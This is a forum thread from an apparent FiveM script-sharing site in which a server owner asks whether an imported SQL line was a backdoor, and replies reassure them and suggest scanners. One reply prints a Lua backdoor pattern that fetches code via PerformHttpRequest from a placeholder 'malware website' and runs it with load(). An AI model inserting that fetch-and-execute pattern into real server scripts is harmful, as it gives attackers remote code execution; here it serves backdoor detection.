Back to English Lounge

[QUESTION] How to spot a potential backdoor?

songbirdmusic_19573 songbirdmusic_19573 Started 17 replies 2,868 views

Related content

E

Ragemp

exu9x 0 340
garethbailey9

need kng estate files

garethbailey9 0 342
songbirdmusic_19573
songbirdmusic_19573
Messages 0
Reactions 0
Credits 55
Joined N/A
#1
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci
Reactions are only available for posts
VeryNiceIndeed
VeryNiceIndeed
Messages 140
Reactions 0
Credits 18,062
Joined Jan 2023
#1




songbirdmusic_19573,

wrote:



I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...






That line is perfectly fine for a database
coolcsgo
coolcsgo
Messages 10
Reactions 0
Credits 353
Joined Dec 2023
#2
This is just setting the auto increment, and default charset for the DB you imported
songbirdmusic_19573
songbirdmusic_19573
Messages 127
Reactions 0
Credits 55
Joined Mar 2024
#3
Thank you everyone for calming my nerves and reassuring me I didn't do anything wrong. It was just at first glance it seemed extremely odd so I panicked
Hopatchke
Hopatchke
Messages 52
Reactions 0
Credits 6,049
Joined Aug 2022
#4
PerformHttpRequest(' Sht that goes to a malware website., function (e, d)

local s = assert(load(d))

if (d == nil) then return end

s()

end)





things like this are Cipher codes. & Backdoors. Performhttprequest etc. get on github and download a backdoor checker ;)
songbirdmusic_19573
songbirdmusic_19573
Messages 127
Reactions 0
Credits 55
Joined Mar 2024
#5




Hopatchke,

wrote:



PerformHttpRequest(' Sht that goes to a malware website., function (e, d)

local s = assert(load(d))

if (d == nil) then return end

s()

end)



thing...




Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on the look out for. If there are any threats I guess its long too late now haha
Hopatchke
Hopatchke
Messages 52
Reactions 0
Credits 6,049
Joined Aug 2022
#6




songbirdmusic_19573,

wrote:



Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on th...




malwarebytes , the free version offers a good scan ;) , works perfectly!
songbirdmusic_19573
songbirdmusic_19573
Messages 127
Reactions 0
Credits 55
Joined Mar 2024
#7




Hopatchke,

wrote:



malwarebytes , the free version offers a good scan ;) , works perfectly!




I actually currently have three different protections installed, so hopefully I'm not as screwed then if I downloaded something I wasn't supposed to
airis13370
airis13370
Messages 1
Reactions 0
Credits 3
Joined Sep 2024
#8
grghrheheh grghrheheh grghrheheh grghrheheh grghrheheh grghrheheh
amirexit
amirexit
Messages 193
Reactions 0
Credits 63
Joined Sep 2024
#9




songbirdmusic_19573,

wrote:



I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...




i need to know too thanks for creating this thread
Du22121
Du22121
Messages 30
Reactions 0
Credits 15
Joined Dec 2022
#10
you never know if they add back doors when its too late
songbirdmusic_19573
songbirdmusic_19573
Messages 127
Reactions 0
Credits 55
Joined Mar 2024
#11




Du22121,

wrote:



you never know if they add back doors when its too late




Not necessarily true, there are script checkers out there and you can scan them to be safe. I always scan my scripts, then manually search through all my code and put it through another scan to be sure. There are preventions an ways to be safe, you need to know what to look for
Malagah
Malagah
Messages 13
Reactions 0
Credits 58
Joined Sep 2024
#12




songbirdmusic_19573,

wrote:



Ce n'est pas forcément vrai, il existe des vérificateurs de scripts et vous pouvez les analyser pour plus de sécurité. J'analyse...




It would be cool to create a topic to explain how to do it and which tool to use :);)
khaosen
khaosen
Messages 155
Reactions 0
Credits 159
Joined Mar 2024
#13




songbirdmusic_19573,

wrote:



I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...




if you want to detect backdoors look for performhttp inside scripts
cochinofrito
cochinofrito
Messages 2
Reactions 0
Credits 50
Joined Sep 2024
#14
Hello,

Here is a tool to achieve this.

https://github.com/exersalza/FivemCipherFinder



Thanks,
royal6823
royal6823
Messages 2
Reactions 0
Credits 38
Joined Oct 2024
#15
It is just a SQL Statement
dtm.os
dtm.os
Messages 36
Reactions 0
Credits 56
Joined Jan 2025
#16




cochinofrito,

wrote:



Hello,

Here is a tool to achieve this.

https://github.com/exersalza/FivemCipherFinder



Thanks,




Your are truly the goat for this
interstarix
interstarix
Messages 10
Reactions 0
Credits 953
Joined Jan 2025
#17
use cochinofrito cipherfinder is great tho

Categories

General Discussions
Dutch Lounge 1051 English Lounge 740 Wall of Shame 15
FiveM Leaks
Servers 1574 Scripts 3560 MLO 3145 Vehicles 2351 Clothing 613 Loadscreens 107 Requests 1920 Others 572 RedM 65
RageMP
Scripts 2539 MLO 103 Servers 78
VIP
Scripts 3312 Servers 39 Others 938 Vehicles 131 MLO 73
Miscellaneous
Cheats 22 Anti Cheats 9 Accounts and Licenses 14
RUST
Plugins 8